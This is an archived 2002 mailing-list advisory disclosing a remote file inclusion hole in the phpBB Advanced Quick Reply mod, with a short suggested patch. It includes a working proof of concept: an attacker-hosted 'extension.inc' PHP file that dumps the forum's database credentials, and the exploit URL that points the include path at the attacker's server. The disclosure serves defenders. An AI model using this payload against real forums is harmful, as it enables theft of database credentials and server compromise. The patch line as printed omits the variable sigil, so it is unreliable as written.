('binary' encoding is not supported, stored as-is) Software: phpBB Advanced Quick Reply Mod I've found a security hole in this sofware (Code Injection). You can download this software at http://phpbbhacks.com/viewhack.php?id=586 Hackers can exploit this Mod to inject some shell code to hack your forum, your website or your server (local exploit) because Code Injection is a dangerous technique of hackers. Exploit: (quick_reply.php) if ( $mode == 'smilies' ) { define('IN_PHPBB', true); include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); include($phpbb_root_path . 'includes/functions_post.'.$phpEx); generate_smilies('window', PAGE_POSTING); exit; } And you can make a php file which named 'extension.inc' to inclusion to access that forum. example: <?php include('config'.'.php'); echo "DB Type: $dbms <br>"; echo "DB Host: $dbhost <br>"; echo "DB Name: $dbname <br>"; echo "DB User: $dbuser <br>"; echo "DB Pass: $dbpasswd <br>"; exit; ?> After that, you upload this file to your server (http://[Your Server]/extension.inc) and enter URL http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles You'll be recived all DB Info of forum Patch: (quick_reply.php) [FIND] if ( $mode == 'smilies' ) { [ADD BEFORE] phpbb_root_path = "./"; Sorry for my poor english. Luke (HVA) http://www.hackervn.net
This archive was generated by hypermail 2b30 : Fri Nov 15 2002 - 13:18:26 PST